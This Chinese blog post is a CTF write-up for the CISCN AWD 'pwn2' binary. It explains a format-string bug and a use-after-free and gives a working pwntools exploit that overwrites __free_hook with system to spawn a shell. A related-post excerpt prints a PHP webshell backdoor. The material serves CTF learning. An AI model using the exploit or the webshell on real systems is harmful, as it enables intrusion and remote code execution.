ciscn 华中赛区分区赛 awd pwn2

最新推荐文章于 2023-02-09 22:20:40 发布
最新推荐文章于 2023-02-09 22:20:40 发布
阅读量562 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/yongbaoii/article/details/118437299
该博客详细介绍了如何利用C程序中一个包含格式化字符串漏洞和Use-After-Free(UAF)漏洞的libc2.27库。作者通过记录、删除、浏览和重写操作展示了漏洞利用过程,并给出了exploit代码,最终实现对系统调用的控制。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在这里插入图片描述
libc 2.27

record
在这里插入图片描述
结构还是比较清晰的。

申请了一个大小为0x110的chunk。前0x10是mark,后0x100是msg。
在最后八个字节那里,维护了一个单链表。

scrape
在这里插入图片描述也就是删除,但是在删除链表尾的时候有uaf。

browser
在这里插入图片描述
就是输出,上面花里胡哨的也没啥用,然后有个格式化字符串漏洞。

rewrite
在这里插入图片描述可以重新写一下。

backdoor
在这里插入图片描述
也是在做一个输出。

漏洞有俩,一个格式化字符串,一个uaf。
uaf利用半天利用不出来,格式化字符串倒是简单。

exp

from pwn import*

context.log_level = "debug"

r = process("./2")

libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.27-3ubuntu1.2_amd64/libc.so.6")


def record(msg, mark):
    r.sendlineafter('>', '1')
    r.sendlineafter('>', msg)
    r.sendafter('>', mark.ljust(16, '\x00'))

def scrape(mark):
    r.sendlineafter('>', '2')
    r.sendafter('>', mark.ljust(16, '\x00'))

def browser(mark):
    r.sendlineafter('>', '3')
    r.sendafter('>', mark.ljust(16, '\x00'))

def rewrite(msg, mark):
    r.sendlineafter('>', '4')
    r.sendafter('>', mark.ljust(16, '\x00'))
    r.sendlineafter('>', msg)


r = process('./2')

record('%50$p', 'sh;')
browser('sh;')
libc_address = int(recvline().strip(), 16)-0x21fb7
free_hook = libc.symbols['__free_hook']
system = libc.symbols['system']
print "libc_base = " + hex(libc_address)

writes = {free_hook: system}
payload = fmtstr_payload(10, writes)
rewrite(payload, 'sh;')
browser('sh;')
scrape('sh;')

r.interactive()
ciscn2021东北赛区分区赛
kingdring的博客
06-15 706
ciscn2021东北赛区分区赛 ++Spirit k1ling 感谢Dazz1e大佬陪我看了很久hh summary 3720pt,rank11 晋级名单还没出,不过大概率是前10进,正好卡掉了,就差一步到罗马,真的意难平… 但是想想自己菜成这样全靠gs带也就释然了一些 这东西就跟S赛一样,今年没了你就要咽下所有的不甘,然后更加努力,等着明年杀回来 ++Spirit绝不会止步于此 今年进第二轮之后改了个名,k某人想去ciscn决赛,去决赛之前不改名,不管哪年,flag立这了。 misc 签到 工具
awd的批量脚本 pwn_CTF线下赛AWD套路小结
weixin_39784972的博客
12-20 1936
CTF线下赛AWD套路小结本文已在先知社区发表,欢迎访问,链接h最近打了2场CTF线下赛,把AWD模式中的一些小套路做一些总结,本人web狗,二进制部分就不班门弄斧了。一、AWD模式简介AWD:Attack With Defence,比赛中每个队伍维护多台服务器,服务器中存在多个漏洞,利用漏洞攻击其他队伍可以进行得分,修复漏洞可以避免被其他队伍攻击失分。一般分配Web服务器,服务器(多数为Linu...
CISCN分区赛华东北部分wp
Htt9999的博客
06-27 867
华东北分区赛部分wp
ciscn-2022 东北赛区分区赛 RE-hana
qq_34010404的博客
07-20 682
逆向太菜了,当时没逆出来,今天复现一下,虽然出了,但是是下断点断出来的…
ciscn 2022 华东北分区赛pwn blue
z1r0的博客
07-02 1053
开了沙盒 最简单的解法还是借助environ来控制ret地址,然后将ret改成orw链即可。这一题的关键点在于怎么泄露出environ里面的栈地址,因为show功能只能使用一次。 这一题的漏洞点是一次性的uaf漏洞,在666功能下 我们首先先借助这一次性的uaf泄露出libc。还是填满tcache,只不过下一个进unsorted bin的时候利用666这个uaf功能。 接下来思考一下如何泄露出environ里面的值,show是一次性的已经用不了。仔细思考一下不难想出利用stdout来泄露,将flags
CISCN2021 西北赛区分区赛 Web xb_web_flask_trick
feng的博客
06-08 880
前言 6.5号去了兰州打了分区赛,4道Web出了web1和web4,web2和web3都不会。这题flask是web3,讲道理对我这种对flask不熟悉的弟弟来说还是挺难的,比赛的时候只有西电的一个队伍出了。今天晚上在学长的帮助下终于出了这道题,也是学到了很多的东西。 源码 import os from flask import Flask, request, abort, session app = Flask(__name__) app.config["SECRET_KEY"] = os.urand
BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-8.zip
12-07
BugKu 2021 CTF AWD 排位赛 真题
第一届长城杯 第三赛区 半决赛 AWD 源码
04-23
【标题】"第一届长城杯 第三赛区 半决赛 AWD 源码"指的是一个编程竞赛的源代码,很可能是参赛队伍在半决赛阶段使用的自动武器动态(AWD)系统的代码。这个标题揭示了这是一个与软件开发竞赛相关的内容,特别关注的是...
PwnWAF:用于AWDpwn日志工具
05-16
用于AWDpwn日志工具 描述 使用traceGen.py生成elf文件。 elf_name:我们要记录哪个elf文件 log_path:日志文件 计算机:此精灵的平台,(仅支持x86 / x86_64) 注意:elf_name和log_path必须是绝对路径 用法: ...
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
ciscn2021 西北分区赛部分pwn
mishixiaodai的博客
06-07 306
xb_pwn_easy 分析发现是道整数溢出的题,unsigned int8最大数为255,当输入的数字超出255时就会发生溢出。但当时做题我将v4输为0,也可以造成溢出,原因是read的第三个参数v4-1=-1,又read的第三个参数类型是size_t,当输入负值时,会将其转换为无符号数。 利用整数溢出漏洞,可以覆盖age、email、phone,可以将email覆盖为函数的got地址,这样就可以获得函数的地址并且得到libc的基地址。 修改puts函数的got表。一开始我将phone覆盖为puts_
ciscn 2022 华东北分区赛pwn bigduck
z1r0的博客
07-01 904
这个是2.33下的,2.33下有free_hook 和 malloc_hook。这题开启了沙盒,禁用了execve 所以考虑orw攻击方法。这里有一个小坑点,2.33下通过unsorted bin泄露的时候,main_arena那里的低字节是\x00,所以直接show的话会show不出来。在show前利用edit将低字节改为\x01即可。最后算libc的时候 - 1即可。两种攻击思路,第一种借助environ泄露出stack然后改edit的ret为orw即可,第二种劫持hook为万能gadget(直接拿2
2022 ciscn 东北赛区分区赛 部分 wp
热门推荐
qq_23321269的博客
06-19 1万+
2022 ciscn 东北分区赛 部分wp
2021 ciscn 华中赛区分区赛 pwn note
yongbaoii的博客
09-02 478
libc 2.31 保护是都拉上的。 刚开始有个花指令,通过一定的调整,再反汇编,就得到了正确的结果。 可以看到除了必要的初始化setbuf之外还将4050的地方清空了。 后面我们会看到4050就是存放地址的地方。 add 看一下content的输入 很明显的off by one。 整体结构还是比较清晰的,最多申请三个chunk。 free 清理的很干净。 show show也是正常泄露。 很明显的off by one,我们的常规思路也就是overlap或者unlink。 因为这里泄露不了基地址,所以我
ciscn 华中赛区分区赛 awd pwn1
yongbaoii的博客
07-15 598
罕见的有保护没有都开。 输入是input sb是第一个: :后面的第一个事sc sc后面第一个回车是sd sd后面第一个又是input E0存放着input E8放着sc 所以其实也就是回车为分界,一组一个回车。 :又将每一组分开,分别存放在E0,E8。 有个strcasecmp函数 头文件:#include <string.h> 定义函数:int strcasecmp (const char *s1, const char *s2); 函数说明:strcasecmp()用来比较参数s1 和.
一次AWD比赛记录
luoluopeach
10-10 624
BEGIN ssh -p 2201 ctf@118.89.227.105 备份文件以后,首先D盾扫一波 使用defence上waf 开始修洞 .config_common.php 这是一个已知后门 <?php error_reporting(0);set_time_limit(0);$a=base64_decode("Y"."X"."N"."z"."Z"."X"."J"."0");$a(@${"_P"."O"."S"."T"}[520]); ?> base64_decode:YXN
2020 ciscn 东北分区赛 re题解
Air_cat的博客
09-19 482
唉,居然没师傅出re题,悲伤 此题考点在于抓取或解密出迷宫,这里我用的原函数进行生成,改改几个定义就可以输出迷宫了: #include<stdio.h> #include<string.h> #include<windows.h> #include<string.h> #include<tchar.h> #include<stdint.h > //#+OXJ xnB1 QWT4 9cnW cGFB ZOjn yfZo ZV1m 7+/
CISCN国赛线下AWD总结与反思
qq_53755216的博客
06-28 1060
整体总结 关于比赛 实战起来和练习还是有很大的不同 到了比赛一上来遇到了3台web 有点手忙脚乱的 比赛是两个cms + 一个game 由于没有经验 一时不知道从哪里入手或从哪里去打 导致对团队做出的贡献很小 有点遗憾 所以要好好练一练代码审计 并且提高一下运维的技术? 关于攻击和防御 我们发现机器很快被上了马 于是决定把机全部宕掉 我觉得上来备份完后可以手动宕机 然后慢慢修 这里有个小问题就是 数据库的备份问题 这次比赛没有很简单能够打数据库的洞 所以数据库没被打 并且我们第一天三个web一直宕机 导致没
记录复现一下第一次awd
qq_63928796的博客
02-09 767
之前没打过awd,这次学长组织了一场awd娱乐赛,两个web一个pwn,还有一个黑盒,只会web,第一次啥也不会瞎打,被打烂了,不会写脚本,手交flag的感觉真“不错”,感觉awd还是比ctf好多了(虽然啥也不会),浅浅复现一下。
awd pwn修复
最新发布
03-08
### AWD PWN 漏洞修复方案 针对AWD(Attack-Defense Competition)环境下的PWN类漏洞,通常涉及内存管理不当、缓冲区溢出等问题。对于这些类型的漏洞,有效的修复措施可以从多个角度入手。 #### 1. 防范缓冲区溢出攻击 为了防止`strcpy`函数引发的缓冲区溢出问题,可以采用更安全的数据复制方式,比如使用带有长度参数的安全API `strncpy` 或者 C++ 中的字符串处理库[^3]: ```cpp // 安全替代 strcpy 的例子 char dest[SIZE]; memset(dest, 0, SIZE); // 初始化目标数组 strncpy(dest, source, sizeof(dest)-1); ``` 这种方法能够有效避免因输入数据过长而导致的目标缓冲区被覆盖的情况发生。 #### 2. 处理内存泄漏风险 当遇到可能导致内存泄漏的操作时,可以通过特定字符终止未预期的行为。例如,在某些场景下利用`\x00`作为字符串结束符来阻止进一步读取不必要的内存区域: ```c buffer[position] = '\x00'; // 手动设置字符串结尾标记 ``` 此操作有助于减少潜在的信息泄露路径,并增强系统的安全性。 #### 3. 加强源码审查机制 由于此类竞赛题目往往包含复杂的逻辑结构,因此建议开发团队建立严格的代码审核流程,确保每一行代码都经过充分验证后再投入使用。特别是在面对较长且容易忽略的关键部分时更要加倍小心[^4]。 #### 4. 实施自动化工具辅助检测 借助专门设计用于发现常见编程错误和安全隐患的静态分析器或动态测试框架,可以帮助快速定位并修正隐藏较深的问题。像提到过的AwdPwnPatcher就是这样一款能自动识别AWD-Lite组件中存在的典型缺陷的应用程序[^1]。 通过上述手段相结合的方式,可以在很大程度上提高软件产品的健壮性和抗攻击能力,从而更好地应对AWD比赛或其他实际应用场景中的挑战。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值